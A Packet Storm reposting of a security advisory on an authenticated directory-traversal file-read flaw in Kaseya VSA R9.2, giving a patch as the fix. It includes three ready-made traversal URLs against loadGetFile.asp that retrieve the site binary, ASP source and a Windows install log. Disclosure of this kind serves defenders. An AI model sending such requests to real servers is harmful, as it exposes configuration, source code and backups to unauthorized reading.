exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Kaseya VSA R9.2 Arbitrary File Read

Kaseya VSA R9.2 Arbitrary File Read
Posted Jan 15, 2018
Authored by Securify B.V., Kin Hung Cheng, Robert Hartshorn

A security vulnerability was found in Kaseya VSA file download file functionality. Using this vulnerability an authenticated user in a Kaseya VSA environment is able to download arbitrary files from the server (including source code of Kaseya, the database backups, configuration files, and even windows files). Version R9.2 was found affected.

tags | exploit, arbitrary
systems | windows
SHA-256 | a9945cf5a3532305e46699a157c53b03bab386f744bdea713fee52330aadad85

Kaseya VSA R9.2 Arbitrary File Read

Change Mirror Download
------------------------------------------------------------------------
Arbitrary file read in Kaseya VSA
------------------------------------------------------------------------
Kin Hung Cheng, Robert Hartshorn, May 2017

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A security vulnerability was found in Kaseya VSA file download file
functionality. Using this vulnerability an authenticated user in a
Kaseya VSA environment is able to download arbitrary files from the
server (including source code of Kaseya, the database backups,
configuration files, and even windows files).

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on version R9.2

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Patch to the latest version of VSA.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20170502/arbitrary-file-read-in-kaseya-vsa.html

Details

With the ability to download files from remote computers we gain the ability to download files from the server. The downloading files from remote computer is implemented by being able to download files from a folder on the remote computer. This makes a directory on the server that is synced with the remote computer and an admin can download from this directory. By using directory traversal with this functionality we can download any file from the server.


Examples of files that can be of interest for an attacker:
- The binary of the website (can be decompiled to source code using dotPeek):
http://<host>/ConfigTab/loadGetFile.asp?filename=..\..\..\..\Kaseya\vsapres\bin\Kaseya.Web.dll&theMachine=744950587060816

- ASP-webpages and their sources:
http://<host>/ConfigTab/loadGetFile.asp?filename=..\..\..\..\Kaseya\WebPages\dl.asp&theMachine=744950587060816

- Unattended Windows installation log:
http://<host>/ConfigTab/loadGetFile.asp?filename=..\..\..\..\Windows\Panther\Cbs_unattend.log&theMachine=744950587060816


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close